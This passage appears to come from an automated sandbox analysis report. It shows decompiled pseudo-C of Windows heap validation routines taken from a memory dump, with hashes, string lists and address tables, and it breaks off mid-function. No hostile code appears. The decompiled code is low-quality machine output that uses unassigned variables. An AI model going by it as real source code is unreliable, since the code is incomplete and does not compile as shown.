                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 193612466a11511d7bb24c9291de3c2487ee650e16ef4260235928ef534bd244
                                                • Instruction ID: f1dd96b82db896329b61e292c9a7c2b1d028bc0de8f6dda4769c1fa4f4200a04
                                                • Opcode Fuzzy Hash: 193612466a11511d7bb24c9291de3c2487ee650e16ef4260235928ef534bd244
                                                • Instruction Fuzzy Hash: E312CE702006429FEB25CF69C495BFBBBF5EF08314F18845AE5868B7A1D774E881CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01474496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 56%
                                                			E01474496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E014749A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x14a6378 = _t267;
						asm("int3");
						 *0x14a6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E013E174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E013BB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E013BB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x14a6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E013F9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E013E174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E013BB150();
										} else {
											E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E013BB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E013BB150();
									} else {
										E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E013BB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E013BB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01474AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0146FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E014623E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                0x014744a1
                                                0x014744a3
                                                0x014744a7
                                                0x014744ac
                                                0x014744af
                                                0x014744b2
                                                0x014744b9
                                                0x014744bc
                                                0x014747f2
                                                0x014747f2
                                                0x014747f8
                                                0x014747fc
                                                0x014747fe
                                                0x01474804
                                                0x01474805
                                                0x01474805
                                                0x0147480c
                                                0x01474810
                                                0x01474812
                                                0x01474812
                                                0x01474812
                                                0x01474822
                                                0x01474822
                                                0x01474827
                                                0x01474827
                                                0x00000000
                                                0x01474827
                                                0x014744c4
                                                0x014744d3
                                                0x014744d9
                                                0x014744dc
                                                0x014744de
                                                0x014744e0
                                                0x01474560
                                                0x01474520
                                                0x01474522
                                                0x01474525
                                                0x01474528
                                                0x0147452b
                                                0x0147452e
                                                0x01474530
                                                0x01474697
                                                0x0147469d
                                                0x014746a1
                                                0x014746c0
                                                0x014746c5
                                                0x014746a3
                                                0x014746b8
                                                0x014746bd
                                                0x014746cb
                                                0x014746d4
                                                0x01474677
                                                0x01474677
                                                0x01474679
                                                0x0147467c
                                                0x0147468a
                                                0x01474690
                                                0x01474690
                                                0x014747f1
                                                0x014747f1
                                                0x014747f1
                                                0x00000000
                                                0x014747f1
                                                0x01474536
                                                0x01474539
                                                0x0147453c
                                                0x01474636
                                                0x0147463c
                                                0x01474640
                                                0x0147465f
                                                0x01474664
                                                0x01474642
                                                0x01474657
                                                0x0147465c
                                                0x01474670
                                                0x00000000
                                                0x01474542
                                                0x01474542
                                                0x01474546
                                                0x01474548
                                                0x0147454b
                                                0x01474555
                                                0x0147455b
                                                0x0147455b
                                                0x0147455b
                                                0x0147455d
                                                0x0147455d
                                                0x0147455d
                                                0x00000000
                                                0x0147455d
                                                0x0147453c
                                                0x01474579
                                                0x0147457c
                                                0x01474587
                                                0x01474589
                                                0x01474591
                                                0x01474592
                                                0x01474597
                                                0x01474598
                                                0x014745a1
                                                0x014745ab
                                                0x014745ab
                                                0x014745a1
                                                0x014745ae
                                                0x014745b4
                                                0x014745b9
                                                0x014745bd
                                                0x01474759
                                                0x01474759
                                                0x0147475f
                                                0x01474761
                                                0x01474763
                                                0x01474765
                                                0x01474768
                                                0x0147476b
                                                0x0147476d
                                                0x0147479c
                                                0x0147479c
                                                0x0147479f
                                                0x014747a2
                                                0x014747a4
                                                0x01474830
                                                0x01474833
                                                0x01474879
                                                0x0147487d
                                                0x014748f1
                                                0x014748f3
                                                0x014748f3
                                                0x00000000
                                                0x014748f3
                                                0x0147487f
                                                0x01474885
                                                0x01474887
                                                0x014748a8
                                                0x014748a8
                                                0x014748ae
                                                0x014748b0
                                                0x014748dc
                                                0x014748dc
                                                0x014748dc
                                                0x014748dc
                                                0x014748ec
                                                0x00000000
                                                0x014748ec
                                                0x014748b2
                                                0x014748bc
                                                0x014748be
                                                0x014748c1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x014748c3
                                                0x014748c3
                                                0x014748c6
                                                0x014748c9
                                                0x014748cc
                                                0x014748d1
                                                0x014748d4
                                                0x00000000
                                                0x00000000
                                                0x014748d6
                                                0x014748d7
                                                0x014748da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x014748da
                                                0x0147494f
                                                0x01474955
                                                0x01474959
                                                0x01474978
                                                0x0147497d
                                                0x0147495b
                                                0x01474970
                                                0x01474975
                                                0x01474986
                                                0x01474987
                                                0x0147498a
                                                0x0147498d
                                                0x01474997
                                                0x014747ef
                                                0x014747ef
                                                0x014747ef
                                                0x00000000
                                                0x014747ef
                                                0x01474890
                                                0x01474890
                                                0x01474891
                                                0x01474891
                                                0x01474894
                                                0x01474897
                                                0x0147489d
                                                0x014748a0
                                                0x00000000
                                                0x00000000
                                                0x014748a2
                                                0x014748a3
                                                0x014748a6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x014748a6
                                                0x014748fb
                                                0x01474901
                                                0x01474905
                                                0x01474924
                                                0x01474929
                                                0x01474907
                                                0x0147491c
                                                0x01474921
                                                0x0147492f
                                                0x01474935
                                                0x01474936
                                                0x01474939
                                                0x01474942
                                                0x00000000
                                                0x01474947
                                                0x01474835
                                                0x0147483b
                                                0x0147483f
                                                0x0147485e
                                                0x01474863
                                                0x01474841
                                                0x01474856
                                                0x0147485b
                                                0x01474869
                                                0x0147486c
                                                0x0147486f
                                                0x014747e7
                                                0x014747e7
                                                0x00000000
                                                0x014747ec
                                                0x014747aa
                                                0x014747b0
                                                0x014747b4
                                                0x014747d3
                                                0x014747d8
                                                0x014747b6
                                                0x014747cb
                                                0x014747d0
                                                0x014747de
                                                0x014747df
                                                0x014747e2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0147476f
                                                0x0147476f
                                                0x01474778
                                                0x01474785
                                                0x01474787
                                                0x0147478c
                                                0x0147478e
                                                0x00000000
                                                0x00000000
                                                0x01474790
                                                0x01474792
                                                0x01474794
                                                0x00000000
                                                0x00000000
                                                0x01474796
                                                0x01474799
                                                0x00000000
                                                0x01474799
                                                0x00000000
                                                0x014745c3
                                                0x014745c3
                                                0x014745c7
                                                0x014745c7
                                                0x014745ca
                                                0x014745cf
                                                0x014745d3
                                                0x014745df
                                                0x014745e4
                                                0x014745e6
                                                0x014745e8
                                                0x014745ed
                                                0x014745ed
                                                0x014745f2
                                                0x014745f2
                                                0x014745f7
                                                0x014745fc
                                                0x01474602
                                                0x01474606
                                                0x01474609
                                                0x0147460f
                                                0x014746de
                                                0x014746e3
                                                0x014746e5
                                                0x014746ec
                                                0x014746ee
                                                0x014746f6
                                                0x014746f6
                                                0x014746f6
                                                0x014746f6
                                                0x014746ec
                                                0x01474615
                                                0x01474615
                                                0x0147461d
                                                0x0147462e
                                                0x0147462e
                                                0x0147461d
                                                0x0147460f
                                                0x01474609
                                                0x014746fd
                                                0x00000000
                                                0x00000000
                                                0x01474710
                                                0x0147471a
                                                0x01474720
                                                0x01474720
                                                0x01474722
                                                0x0147472c
                                                0x00000000
                                                0x0147472e
                                                0x0147472e
                                                0x00000000
                                                0x0147472e
                                                0x0147472c
                                                0x01474738
                                                0x0147473c
                                                0x0147474b
                                                0x01474751
                                                0x01474751
                                                0x00000000
                                                0x0147473c
                                                0x014748f4
                                                0x014748f4
                                                0x00000000
                                                0x014748f4

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                • API String ID: 0-1357697941
                                                • Opcode ID: cc4c81a88f3e786865839ff618934fba786f2eac7d42016d3ef0a0220b82fb0b
                                                • Instruction ID: 46d69d122e775266ed47546f862bd8541bcb41f943ea61f56aae308b443228b8
                                                • Opcode Fuzzy Hash: cc4c81a88f3e786865839ff618934fba786f2eac7d42016d3ef0a0220b82fb0b
                                                • Instruction Fuzzy Hash: 31F1FF75600646DFDB25CBA9C480BFAFBF9FF09308F09801AE24697761D734A946CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013DA309, Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E013DA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x14a8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E013DA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E013DDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E013B9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E013BA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x14a8748 - 1;
						if( *0x14a8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E013BB150();
								__eflags =  *0x14a7bc8;
								if( *0x14a7bc8 == 0) {
									__eflags = 1;
									E01472073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x14a8748 - 1;
							if( *0x14a8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E013E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E013D7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E014714FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E013B9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E013B9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x14a8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E013BB150();
											} else {
												E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E013BB150();
											_pop(_t491);
											__eflags =  *0x14a7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01472073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0147A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E013DA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E013D7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E013D7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01471411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E013D7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
